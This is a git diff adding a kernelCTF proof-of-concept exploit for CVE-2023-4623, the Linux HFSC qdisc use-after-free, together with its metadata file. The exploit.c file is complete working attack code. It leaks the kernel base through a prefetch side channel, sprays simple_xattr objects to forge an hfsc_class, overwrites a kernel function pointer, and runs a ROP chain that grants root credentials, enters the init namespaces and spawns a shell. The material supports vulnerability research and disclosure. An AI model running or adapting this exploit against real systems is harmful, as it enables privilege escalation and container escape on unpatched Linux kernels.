a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c new file mode 100644 index 00000000..7f4456c5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c @@ -0,0 +1,481 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* Prefetch kaslr leak */ +#define MIN_STEXT 0xffffffff81000000 +#define MAX_STEXT 0xffffffffbb000000 +#define BASE_INC 0x1000000 +#define SYS_GETUID 0x1a7440 + +/* simple_xattr spray */ +#define XATTR_SPRAY 32 +#define XATTR_HEADER_SIZE 32 +#define XATTR_SLAB_LEN 1024 +#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2) + +/* hfsc_class offsets */ +#define LEVEL_OFFSET 100 +#define CL_PARENT_OFFSET 112 +#define VT_NODE_OFFSET 192 +#define CF_NODE_OFFSET 224 +#define CL_VT_OFFSET 280 +#define CL_CVTMIN_OFFSET 312 + +/* Data offsets */ +#define INIT_NSPROXY 0x26765c0 +#define QFQ_CHANGE_QDISC_LOC 0x295d438 + +/* Function offsets */ +#define PREPARE_KERNEL_CRED 0x1befb0 +#define COMMIT_CREDS 0x1bed10 +#define FIND_TASK_BY_VPID 0x1b5600 +#define SWITCH_TASK_NAMESPACES 0x1bd180 + +/* Gadget offsets */ +#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xdf26ac +#define PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK 0x09e7eb +#define POP_RSP_POP_RBX_RET_THUNK 0x357c79 +#define POP_RDI_RET_THUNK 0x088893 +#define POP_RSI_RET_THUNK 0x0d88a3 +#define POP_RDX_RET_THUNK 0x047e72 +#define POP_RCX_RET_THUNK 0x0271ec +#define MOV_RDI_RAX_THUNK_RCX 0x817ea9 +#define ADD_RAX_RCX_RET_THUNK 0x0d5f84 +#define PUSH_RAX_JMP_RDX_THUNK 0x94dca7 +#define POP_RSP_RET_THUNK 0x068961 +#define MOV_RAX_R14_POP_R14_RET_THUNK 0xa210ac +#define POP_R14_RET_THUNK 0x0d88a2 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +struct tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +#define TC_DATA_LEN 512 + char attrbuf[TC_DATA_LEN]; +}; + +struct if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Netlink message for setting loopback up. */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_index = 1, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + + +int xattr_fd; +char rop_buf[512]; +char jop_buf[0x70]; + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Prefetch timing code from Daniel Gruss. + * https://github.com/IAIK/prefetch + */ + +inline __attribute__((always_inline)) size_t rdtsc_begin () { + size_t a, d; + asm volatile ( + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) size_t rdtsc_end () { + size_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch (void* p) { + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + +size_t onlyreload (void* addr) { + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * Simple implementation of prefetch sidechannel to + * bypass KASLR. + */ + +long kaslr_leak (int tries1, int tries2) { + long base = -1, addr; + size_t time; + size_t min = -1; + + addr = 0xffffffff80000000; + for (int i = 0; i < tries1; i++) { + time = onlyreload(addr); + min = min < time ? min : time; + } + + for (int i = 0; i < tries2; i++) { + for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) { + time = onlyreload(addr + SYS_GETUID); + if (time < min && addr < base) { + base = addr; + } + } + } + return base; +} + +void init_rop (long *rop, long *jop, long kbase) { + *jop++ = kbase + POP_RSP_POP_RBX_RET_THUNK; + /* restore rbx */ + *rop++ = kbase + PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK; + *rop++ = 0; + /* commit_creds(prepare_kernel_cred(0)) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 0; + *rop++ = kbase + PREPARE_KERNEL_CRED; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + COMMIT_CREDS; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* switch_task_namespaces(find_task_by_vpid(1, init_ns_proxy) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 1; + *rop++ = kbase + FIND_TASK_BY_VPID; + *rop++ = kbase + POP_RSI_RET_THUNK; + *rop++ = kbase + INIT_NSPROXY; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + SWITCH_TASK_NAMESPACES; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* return back to the original stack */ + *rop++ = kbase + MOV_RAX_R14_POP_R14_RET_THUNK; + *rop++ = 0; + *rop++ = kbase + POP_RDX_RET_THUNK; + *rop++ = kbase + POP_R14_RET_THUNK; + *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = (long)-384; + *rop++ = kbase + ADD_RAX_RCX_RET_THUNK; + *rop++ = kbase + POP_RDX_RET_THUNK; + *rop++ = kbase + POP_RSP_RET_THUNK; + *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK; +} + +/* Helper functions for creating rtnetlink messages. */ + +unsigned short add_rtattr (struct rtattr *rta, unsigned short type, unsigned short len, char *data) { + rta->rta_type = type; + rta->rta_len = RTA_LENGTH(len); + memcpy(RTA_DATA(rta), data, len); + return rta->rta_len; +} + +int vuln_class_id = 0x00010001; // 1:1, classid of vulnerable RSC parent. +int def_class_id = 0x00010002; // 1:2, classid where packets are enqueued. +struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc; + +void init_tf_msg (struct tf_msg *m) { + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->tm.tcm_family = PF_UNSPEC; + m->tm.tcm_ifindex = if_nametoindex("lo"); + m->nh.nlmsg_len = NLMSG_LENGTH(sizeof(m->tm)); +} + +void init_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = -1; + m->tm.tcm_handle = 1 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + short def = 2; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, 2, &def)); +} + + +void init_rsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = 1 << 16; + m->tm.tcm_handle = vuln_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int rsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_RSC, sizeof(rsc), rsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_fsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = vuln_class_id; + m->tm.tcm_handle = def_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int fsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_FSC, sizeof(fsc), fsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_del_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->nh.nlmsg_type = RTM_DELTCLASS; + m->tm.tcm_handle = vuln_class_id; +} + +void init_qfq_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = 0x00010002; + m->tm.tcm_handle = 2 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq")); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(jop_buf), jop_buf)); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(rop_buf), rop_buf)); +} + +void init_nl_msgs (void) { + init_qdisc_msg(&newqd_msg); + init_del_class_msg(&delc_msg); + init_rsc_class_msg(&new_rsc_msg); + init_fsc_class_msg(&new_fsc_msg); +} + +/* + * Send a Netlink message and check for error + */ +void netlink_write (int sock, struct tf_msg *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack; + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.ne.error) { + errno = -ack.ne.error; + perror("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct tf_msg *m) { + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); +} + +/* + * Allocate simple_xattr objects. + */ +int num_xattr = 0; +char xattr_buf[XATTR_DATA_LEN]; +void spray_simple_xattrs(int num_spray) { + char name[32]; + for (int i = 0; i < num_spray; i++, num_xattr++) { + sprintf(name, "security.%d", num_xattr); + if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1) + err_exit("[-] fsetxattr"); + } +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +void loopback_send (void) { + struct sockaddr iaddr = { AF_INET }; + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + if (write(inet_sock_fd, "", 1) == -1) + err_exit("[-] inet write"); + close(inet_sock_fd); +} + +int main (int argc, char **argv) { + long kernel_base; + + pin_cpu(0); + + /* Get kernel base from command line or prefetch side channel */ + if (argc > 1) { + kernel_base = strtoul(argv[1], NULL, 16); + printf("[*] Using provided kernel base: %p\n", kernel_base); + } else { + printf("[*] Using prefetch to leak kernel base...\n"); + getuid(); + kernel_base = kaslr_leak(1000, 1000); + if (kernel_base == -1) { + printf("[*] Prefetch failed\n"); + exit(EXIT_FAILURE); + } + printf("[*] Leaked kernel base: %p\n", kernel_base); + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open temporary file to use for xattr spray */ + xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664); + if (xattr_fd == -1) + err_exit("[-] open"); + + /* Open socket to send netlink commands to */ + int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_sock_fd == -1) + err_exit("[-] nl socket"); + + /* Set loopback device up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_sock_fd, &if_up_msg); + + init_nl_msgs(); + + /* Trigger vuln */ + netlink_write(nl_sock_fd, &newqd_msg); + netlink_write(nl_sock_fd, &new_rsc_msg); + netlink_write(nl_sock_fd, &new_fsc_msg); + loopback_send(); + delc_msg.tm.tcm_handle = def_class_id; + netlink_write(nl_sock_fd, &delc_msg); + + printf("[*] Triggered vulnerability\n"); + + /* Place fake hfsc_class in xattr */ + + /* hfsc_class.level = 1 (must be non-zero) */ + xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.vt_node = 1 (must be odd) */ + xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.cf_node = 1 (must be odd) */ + xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.parent = &qfq_change_qdisc (write target)*/ + long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET; + memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8); + /* hfsc_class.cl_vt = jop_gadget (write value) */ + long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70; + memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8); + + printf("[*] Spraying simple_xattrs...\n"); + /* Spray simple_xattrs */ + delc_msg.tm.tcm_handle = vuln_class_id; + netlink_write(nl_sock_fd, &delc_msg); + spray_simple_xattrs(XATTR_SPRAY); + + /* Create new default class and trigger enqueue/dequeue to overwrite + * qfq_change_qdisc with jop gadget */ + new_fsc_msg.tm.tcm_parent = 1 << 16; + netlink_write(nl_sock_fd, &new_fsc_msg); + + printf("[*] Overwriting function pointer\n"); + loopback_send(); + + /* Prepare ROP chain at an offset of 4 bytes. With the 4-byte rtattr + header it will be at an 8-byte offset from rsi, allowing it to be reached + with `push rsi ; pop rsp ; pop rbx` for the stack pivot */ + init_rop(rop_buf + 4, jop_buf, kernel_base); + + /* Create QFQ qdisc */ + init_qfq_qdisc_msg(&new_qfq_qdisc); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + /* Call overwritten function pointer */ + printf("[*] Triggering ROP chain\n"); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[+] Returned from ROP\n"); + + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + if (mntns_fd == -1) + perror("[-] open(/proc/1/ns/mnt)"); + + int netns_fd = open("/proc/1/ns/net", O_RDONLY); + if (netns_fd == -1) + perror("[-] open(/proc/1/ns/net)"); + + int pidns_fd = open("/proc/1/ns/pid", O_RDONLY); + if (pidns_fd == -1) + perror("[-] open(/proc/1/ns/pid)"); + + if (setns(mntns_fd, CLONE_NEWNS) == -1) + perror("[-] setns mnt"); + if (setns(netns_fd, CLONE_NEWNET) == -1) + perror("[-] setns net"); + if (setns(pidns_fd, CLONE_NEWPID) == -1) + perror("[-] setns pid"); + + printf("[*] Launching shell\n"); + system("/bin/sh"); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json new file mode 100644 index 00000000..b050b20a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json @@ -0,0 +1,41 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp93", + "exp98" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f", + "cve": "CVE-2023-4623", + "affected_versions": [ + "2.6.3 - 6.5.2" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN" + ], + "kernel_config": [ + "CONFIG_NET_SCH_HFSC" + ] + } + }, + "exploits": { + "lts-6.1.36": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": true, + "stability_notes": "succeeded on 10/10 tries against target instance (with kaslr leak update)" + }, + "cos-97-16919.353.23": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": true, + "stability_notes": "succeeded on 10/10 tries against target instance (with kaslr leak update)" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz new file mode 100644 index 00000000..59770fcf Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz new file mode 100644 index 00000000..f6171fca Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz differ